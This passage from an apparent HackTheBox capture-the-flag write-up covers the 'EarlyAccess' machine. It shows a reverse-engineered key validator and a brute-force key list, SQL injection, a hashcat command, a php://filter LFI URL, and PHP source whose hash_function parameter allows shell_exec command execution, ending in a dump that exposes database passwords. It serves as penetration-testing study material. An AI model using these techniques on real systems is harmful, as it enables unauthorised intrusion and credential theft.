                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
